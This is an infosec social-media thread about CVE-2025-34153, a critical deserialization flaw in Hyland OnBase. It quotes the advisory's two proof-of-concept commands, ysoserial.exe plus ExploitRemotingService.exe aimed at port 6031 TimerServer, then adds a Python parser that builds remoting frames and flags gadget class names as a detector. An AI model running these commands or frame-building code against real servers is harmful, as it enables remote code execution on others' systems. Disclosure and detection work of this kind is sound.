Brutkey

cR0w
@cR0w@infosec.exchange

Holy fucking shit this perfect 10 in Hyland Software OnBase. 🥳🥳

https://gist.github.com/VAMorales/32794cccc2195a935623a12ef32760dc

sev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

https://www.cve.org/CVERecord?id=CVE-2025-34153


cR0w
@cR0w@infosec.exchange

Okay, that was kind of a big reaction. But:

Using ysoserial.exe, the BinaryFormatter deserialization payload is generated with the gadget TypeConfuseDelegate to trigger Remote Code Execution on the server. As a proof of concept, the command provided will have the remote server execute the “whoami” command locally and store the command output of the account currently running the service into the file located at “C:\temp\whoami.txt”.

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'whoami > c:\temp\whoami.txt' -o base64

Using ExploitRemotingService.exe, the generated base64-encoded payload from ysoserial.exe is passed as an argument and sent as a raw deserialization payload to the .NET Remoting TCP Channel on port 6031 with the known URI endpoint TimerServer that was registered inside Hyland.Core.Timers.dll.

ExploitRemotingService.exe tcp://<onbase-server>:6031/TimerServer raw <ysoserial-payload>
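The two commands quoted above describe one wire exchange: a .NET Remoting TCP-channel Request frame addressed to the TimerServer URI whose body is a BinaryFormatter stream. The following is an added example (not code from the post, the gist, or Hyland) that parses such frames from captured bytes and flags the traits the advisory names, so a defender can check a packet capture from port 6031 offline. It assumes the MS-NRTP TCP frame layout (".NET" preamble, version 1.0, operation type, non-chunked length, typed headers, end-of-headers token), that the request URI ends in "TimerServer" as the post states, and a short list of class-name strings as TypeConfuseDelegate indicators; the indicator list and the sample frame are constructed here and the sample body is not a working gadget chain.

```python
"""Parse .NET Remoting TCP frames (MS-NRTP) and flag a BinaryFormatter body sent
to an exposed URI. Added example; frame layout per MS-NRTP section 2.2.3.3."""
import base64
import struct

REMOTING_MAGIC = b".NET"
OP_REQUEST, OP_ONEWAY, OP_REPLY = 0, 1, 2
H_END, H_CUSTOM, H_STATUS, H_PHRASE, H_URI, H_CLOSE, H_CTYPE = range(7)
# SerializationHeaderRecord every BinaryFormatter stream starts with:
# record type 0, RootId 1, HeaderId -1, major 1, minor 0. Its base64 form is the
# "AAEAAAD/////AQAAAAAAAAA" prefix that ysoserial.exe -o base64 output begins with.
BINARYFORMATTER_HEADER = bytes.fromhex("00" "01000000" "ffffffff" "01000000" "00000000")
# Assumption: class names the TypeConfuseDelegate chain serializes; BinaryFormatter
# stores them as length-prefixed UTF-8, so a raw substring search finds them.
GADGET_INDICATORS = [b"System.Diagnostics.Process", b"SortedSet`1", b"ComparisonComparer`1"]


def _counted_string(s: str) -> bytes:
    data = s.encode("utf-8")
    return b"\x01" + struct.pack("<I", len(data)) + data   # 0x01 = UTF-8 encoding


def build_remoting_request(uri: str, body: bytes, content_type="application/octet-stream") -> bytes:
    """Build a non-chunked Request frame the way a remoting TCP client does."""
    frame = REMOTING_MAGIC + bytes([1, 0])                          # protocol version 1.0
    frame += struct.pack("<HHi", OP_REQUEST, 0, len(body))          # op, not chunked, length
    frame += struct.pack("<H", H_URI) + b"\x01" + _counted_string(uri)   # 0x01 = CountedString type
    frame += struct.pack("<H", H_CTYPE) + b"\x01" + _counted_string(content_type)
    frame += struct.pack("<H", H_END)
    return frame + body


def _read_counted_string(data: bytes, pos: int):
    enc = data[pos]                                   # 0 = UTF-16LE, 1 = UTF-8
    n = struct.unpack_from("<I", data, pos + 1)[0]
    pos += 5
    return data[pos:pos + n].decode("utf-8" if enc == 1 else "utf-16-le"), pos + n


def _read_value(data: bytes, pos: int):
    dtype = data[pos]
    pos += 1
    if dtype == 0x00:                                 # Void
        return None, pos
    if dtype == 0x01:                                 # CountedString
        return _read_counted_string(data, pos)
    if dtype == 0x02:                                 # Byte
        return data[pos], pos + 1
    if dtype == 0x03:                                 # UInt16
        return struct.unpack_from("<H", data, pos)[0], pos + 2
    if dtype == 0x04:                                 # Int32
        return struct.unpack_from("<i", data, pos)[0], pos + 4
    raise ValueError(f"unknown header data type {dtype:#x}")


def parse_remoting_frame(data: bytes):
    """Return {'op', 'headers', 'body'} for a non-chunked frame, or None if the
    bytes do not start with the .NET remoting preamble."""
    if len(data) < 14 or not data.startswith(REMOTING_MAGIC):
        return None
    major, minor, op, dist = struct.unpack_from("<BBHH", data, 4)
    if (major, minor) != (1, 0):
        raise ValueError(f"unexpected remoting version {major}.{minor}")
    if dist != 0:
        raise ValueError("chunked content not handled")
    length = struct.unpack_from("<i", data, 10)[0]
    pos, headers = 14, {}
    names = {H_URI: "uri", H_CTYPE: "content_type", H_STATUS: "status",
             H_PHRASE: "status_phrase", H_CLOSE: "close"}
    while True:
        token = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if token == H_END:
            break
        if token == H_CUSTOM:                         # bare name string, then typed value
            name, pos = _read_counted_string(data, pos)
        elif token in names:
            name = names[token]
        else:
            raise ValueError(f"unknown header token {token:#x}")
        headers[name], pos = _read_value(data, pos)
    if len(data) < pos + length:
        raise ValueError("truncated body")
    return {"op": op, "headers": headers, "body": data[pos:pos + length]}


def flag_request(data: bytes, exposed_uris=("TimerServer",)):
    """Findings for one captured frame; [] means nothing notable."""
    frame = parse_remoting_frame(data)
    if frame is None or frame["op"] not in (OP_REQUEST, OP_ONEWAY):
        return []
    findings = []
    uri = frame["headers"].get("uri", "")
    if uri.rstrip("/").rsplit("/", 1)[-1] in exposed_uris:
        findings.append("request-to-exposed-uri")
    body = frame["body"]
    if body.startswith(BINARYFORMATTER_HEADER):
        findings.append("binaryformatter-body")
    findings += ["gadget-string:" + s.decode() for s in GADGET_INDICATORS if s in body]
    return findings


def decode_ysoserial_b64(text: str) -> bytes:
    """Decode `ysoserial.exe ... -o base64` output so it can be inspected offline."""
    return base64.b64decode(text)


# Constructed sample: header record, one BinaryLibrary record naming a class, MessageEnd.
_NAME = b"System.Diagnostics.Process"
SAMPLE_BODY = BINARYFORMATTER_HEADER + b"\x0c" + struct.pack("<i", 2) + bytes([len(_NAME)]) + _NAME + b"\x0b"
SAMPLE_FRAME = build_remoting_request("tcp://onbase-server:6031/TimerServer", SAMPLE_BODY)

if __name__ == "__main__":
    print(flag_request(SAMPLE_FRAME))
```

Every legitimate client of a binary remoting channel also sends BinaryFormatter bodies, so "binaryformatter-body" on its own is normal traffic; the useful signals are a source that should never talk to port 6031 at all, and gadget class names in a body bound for an endpoint such as TimerServer.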

Kallisti
@kallisti@infosec.exchange

@cR0w@infosec.exchange

ysoserial? Makes me nostalgic.
How old is it now? Like a decade?

Rob O :verified:
@nerdpr0f@infosec.exchange

@cR0w@infosec.exchange Nah, I'm sure this is fine and not a big deal. I don't know anyone who uses OnBase at all.

checks email for service downtime notifications